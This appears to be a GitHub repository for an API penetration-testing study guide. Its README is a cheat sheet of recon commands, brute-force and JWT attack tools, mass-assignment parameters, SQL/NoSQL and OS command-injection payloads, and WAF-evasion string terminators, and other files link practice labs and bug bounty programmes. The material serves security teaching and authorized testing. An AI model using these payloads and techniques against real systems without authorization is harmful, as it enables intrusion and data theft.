├── Intro.md ├── LICENSE ├── Learning.md └── README.md /Intro.md: -------------------------------------------------------------------------------- 1 | 2 | - [What is API](https://aws.amazon.com/what-is/api/) 3 | - [OWASP API Security Top 10](https://owasp.org/API-Security/editions/2023/en/0x00-header/) 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Aftab Sama 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Learning.md: -------------------------------------------------------------------------------- 1 | ## Tools 2 | 3 | - https://github.com/ticarpi/jwt_tool 4 | - https://github.com/assetnote/kiterunner 5 | - https://github.com/s0md3v/Arjun 6 | - https://github.com/danielmiessler/SecLists 7 | - https://github.com/hAPI-hacker/Hacking-APIs 8 | 9 | ## Your API Hacking Lab 10 | 11 | ### APIsec.ai has hosted an API hacking lab that you can use to practice your skills. 12 | - crAPI can be found at http://crapi.apisec.ai/ 13 | - vAPI can be found at http://vapi.apisec.ai/ 14 | 15 | ### set up your own lab 16 | - https://github.com/OWASP/crAPI 17 | - https://github.com/roottusk/vapi 18 | 19 | 20 | 21 | ## Additional Resources 22 | 23 | - [The Web Security Academy](https://portswigger.net/web-security): One of the best free online web security training courses on the Internet. 24 | - [APIsecurity.io](https://apisecurity.io/): A weekly newsletter that is a great resource for the latest and greatest API security news. 25 | - [API Hacking Mind Map](https://dsopas.github.io/MindAPI/) by David Sopas. 26 | - Get involved in the Bug Bounty communities: 27 | - [Synack](https://www.synack.com/) 28 | - [BugCrowd](https://www.bugcrowd.com/bug-bounty-list/) 29 | - [HackerOne](https://www.hackerone.com/) 30 | - [Intigriti](https://www.intigriti.com/) 31 | - [Insider PhD Everything API Hacking](https://www.youtube.com/playlist?list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol): Katie Paxton-Fear's playlist of all those great API hacking hits. 32 | - [Awesome API Security](https://github.com/arainho/awesome-api-security): All the API security things. 33 | 34 | ### Courses 35 | - https://university.apisec.ai/ 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # API-Penetration-Testing 2 | 3 | 4 | ## Web API Indicators 5 | 6 | lookout for obvious URL naming schemes: 7 | 8 | - https://target-name.com/api/v1 9 | - https://api.target-name.com/v1 10 | - https://target-name.com/docs 11 | - https://dev.target-name.com/rest 12 | 13 | Look for API indicators within directory names like: 14 | 15 | /api, /api/v1, /v1, /v2, /v3, /rest, /swagger, /swagger.json, /doc, /docs, /graphql, /graphiql, /altair, /playground 16 | 17 | Also, subdomains can also be indicators of web APIs: 18 | - api.target-name.com 19 | - uat.target-name.com 20 | - dev.target-name.com 21 | - developer.target-name.com 22 | - test.target-name.com 23 | 24 | TruffleHog is a great tool for automatically discovering exposed secrets. 25 | - https://github.com/trufflesecurity/trufflehog 26 | 27 | ## Active API Reconnaissance 28 | 29 | - `nmap -sV --script=http-enum -p 80,443,8000,8080` 30 | - `amass enum -active -d target-name.com |grep api` 31 | - The following example uses an API-specific wordlist to find the directories on an IP address: 32 | - ` gobuster dir -u target-name.com:8000 -w /home/hapihacker/api/wordlists/common_apis_160 ` 33 | - Kiterunner for discovering API endpoints and resources. 34 | - https://github.com/assetnote/kiterunner 35 | - ` kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite ` 36 | 37 | ## Authentication Attacks 38 | 39 | brute-force attacks: 40 | - creating targeted password lists 41 | - https://github.com/sc0tfree/mentalist 42 | - https://github.com/Mebus/cupp 43 | 44 | Password Spraying 45 | - combining a long list of users with a short list of targeted passwords. 46 | 47 | ## JWT Attacks 48 | 49 | JWT.io is a free web JWT debugger 50 | - https://jwt.io/ 51 | 52 | Automating JWT attacks with JWT_Tool 53 | - https://github.com/ticarpi/jwt_tool/wiki 54 | 55 | ## Exploiting API Authorization 56 | 57 | - Find Resource IDs and Requests 58 | 59 | #### Authorization Testing Strategy: 60 | 1. Create a UserA account. 61 | 2. Use the API and discover requests that involve resource IDs as UserA. 62 | 3. Document requests that include resource IDs and should require authorization. 63 | 4. Create a UserB account. 64 | 5. Obtaining a valid UserB token and attempt to access UserA's resources. 65 | 66 | - Try changing request method. 67 | 68 | ## Improper Assets Management 69 | > Testing for Improper Assets Management is all about discovering unsupported and non-production versions of an API 70 | 71 | - Non-production versions of an API include any version of the API that was not meant for end-user consumption. Non-production versions could include: 72 | - api.test.target.com 73 | - api.uat.target.com 74 | - beta.api.com 75 | - /api/private 76 | - /api/partner 77 | - /api/test 78 | - Make sure to check out the path, parameters, and headers for any versioning information. 79 | 80 | ## Mass Assignment Attacks 81 | > Mass Assignment vulnerabilities are present when an attacker is able to overwrite object properties that they should not be able to. 82 | 83 | One of the ways that you can discover mass assignment vulnerabilities by finding interesting parameters in API documentation and then adding those parameters to requests. Look for parameters involved in user account properties, critical functions, and administrative actions. 84 | 85 | Testing Account Registration for Mass Assignment 86 | - Try adding other key-values to the JSON POST body, such as: 87 | ``` 88 | "isadmin": true, 89 | "isadmin":"true", 90 | "admin": 1, 91 | "admin": true, 92 | ``` 93 | 94 | - Fuzzing for Mass Assignment with Param Miner 95 | - Right-click on a request that you would like to mine for parameters. Select Extensions > Param Miner > Guess params > Guess JSON parameter. 96 | 97 | #### free tools to see request made to url: 98 | 99 | - http://webhook.site/ 100 | - http://pingb.in/ 101 | - https://requestbin.com/ 102 | - https://canarytokens.org/ 103 | 104 | ## Injection Attacks 105 | 106 | if the API is expecting a certain type of input (number, string, boolean value) send: 107 | - A very large number 108 | - A very large string 109 | - A negative number 110 | - A string (instead of a number or boolean value) 111 | - Random characters 112 | - Boolean values 113 | - Meta characters 114 | 115 | #### SQL Injection Metacharacters 116 | 117 | - SQL metacharacters that can cause some issues: 118 | ```SQL 119 | ' 120 | '' 121 | ;%00 122 | -- 123 | -- - 124 | "" 125 | ; 126 | ' OR '1 127 | ' OR 1 -- - 128 | " OR "" = " 129 | " OR 1 = 1 -- - 130 | ' OR '' = ' 131 | OR 1=1 132 | ``` 133 | 134 | #### NoSQL Injection 135 | 136 | The following are common NoSQL metacharacters you could send in an API request to manipulate the database: 137 | ```json 138 | $gt 139 | {"$gt":""} 140 | {"$gt":-1} 141 | $ne 142 | {"$ne":""} 143 | {"$ne":-1} 144 | $nin 145 | {"$nin":1} 146 | {"$nin":[1]} 147 | {"$where": "sleep(1000)"} 148 | ``` 149 | 150 | $gt is a MongoDB NoSQL query operator that selects documents that are greater than the provided value. 151 | 152 | The $ne query operator selects documents where the value is not equal to the provided value. 153 | 154 | The $nin operator is the “not in” operator, used to select documents where the field value is not within the specified array. 155 | 156 | #### OS Injection 157 | 158 | Characters such as the following all act as command separators, which enable a program to pair multiple commands together on a single line. 159 | 160 | ```Shell 161 | | 162 | || 163 | & 164 | && 165 | ' 166 | " 167 | ; 168 | '" 169 | ``` 170 | 171 | #### Injection Targets 172 | 173 | requests that include user input.examples: 174 | - PUT videos by id 175 | - GET videos by id 176 | - POST change-email 177 | - POST verify-email-token 178 | - POST login 179 | - GET location 180 | - POST check-otp 181 | - POST posts 182 | - POST validate-coupon 183 | - POST orders 184 | 185 | #### WAF Evasion 186 | 187 | String terminators can be placed in different parts of the request, like the path or POST body, to attempt to bypass any restrictions in place. 188 | 189 | Here is a list of potential string terminators you can use: 190 | ``` 191 | %00 192 | 0x00 193 | // 194 | ; 195 | % 196 | ! 197 | ? 198 | [] 199 | %5B%5D 200 | %09 201 | %0a 202 | %0b 203 | %0c 204 | %0e 205 | ``` 206 | 207 | - **Case Switching**: 208 | - Sometimes API security controls are pretty easy to beat. If a security control is built around the literal spelling and case of the components within a request, then case switching can be an effective technique to bypass the controls. 209 | - Encoding Payloads 210 | 211 | Awesome-WAF GitHub repo 212 | 213 | https://github.com/0xInfection/Awesome-WAF#known-bypasses 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 |
223 | 224 | --- 225 | 226 | ## GitAds Sponsored 227 | [![Sponsored by GitAds](https://gitads.dev/v1/ad-serve?source=aftab700/api-penetration-testing@github)](https://gitads.dev/v1/ad-track?source=aftab700/api-penetration-testing@github) 228 | 229 | --------------------------------------------------------------------------------